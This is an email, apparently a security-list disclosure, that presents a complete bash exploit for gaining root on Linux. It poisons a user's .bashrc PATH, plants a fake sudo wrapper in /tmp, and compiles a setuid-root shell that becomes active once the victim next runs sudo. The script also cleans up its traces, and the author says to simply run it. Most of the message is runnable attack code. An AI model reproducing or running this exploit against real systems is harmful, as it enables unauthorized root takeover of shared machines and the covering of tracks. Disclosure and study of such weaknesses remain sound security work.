Hi,
I written an exploit which allow to became root when a normal user use sudo.
The following code add to the .bashrc configuration file the /tmp path. Then
when the user exec sudo he runs the fake one, giving you a root shell. Just run
it, when the normal user will use sudo you will get a root shell.
chmod +x ./exploit.sh && ./exploit.sh
#!/bin/bash
PAYLOAD="/bin/bash"
CFILE=".temp0000"
PRIV="root"
COLOR='\033[1;31m'
echo -e "$COLOR"
echo -e "\n - Adding /tmp path on $HOME/.bashrc"; sleep 1
echo export PATH=/tmp:$PATH >> $HOME/.bashrc
echo -e " - Creating C executable with setuid 0 "
sleep 1
echo "#include <stdlib.h>" >/tmp/$CFILE.c
echo "int main(void) {" >>/tmp/$CFILE.c
echo "setuid(0);" >>/tmp/$CFILE.c
echo "system(\"$PAYLOAD\"); }" >>/tmp/$CFILE.c
/usr/bin/gcc /tmp/$CFILE.c -o /tmp/$CFILE &> /dev/null
rm -rf /tmp/$CFILE.c
echo -e " - Creating sudo script which will be executed by the victim "; sleep 1
echo "#!/bin/bash" > /tmp/sudo
echo "/usr/bin/sudo chown root:root /tmp/$CFILE && /usr/bin/sudo chmod 4755
/tmp/$CFILE" >> /tmp/sudo
echo "/usr/bin/sudo \$1 \$2 \$3 \$4 \$5" >>/tmp/sudo && chmod +x /tmp/sudo
echo " - Wait while the victim open a shell and execute sudo"
while [[ $(stat -c '%U' /tmp/$CFILE) != $PRIV ]] ;
do
sleep 1
done
echo -e " - Root shell with SETUID 0 created on $CFILE"; sleep 1
echo -e " - Cleaning sudo script and path line\n"; sleep 1
sed -i -e '/^export PATH/d' $HOME/.bashrc
rm -rf /tmp/sudo
/tmp/$CFILE
Impact
An attacker logged into a system as normal user, using a sudo weakness, can
escalate to root
Sent with [ProtonMail](https://protonmail.com) Secure Email.
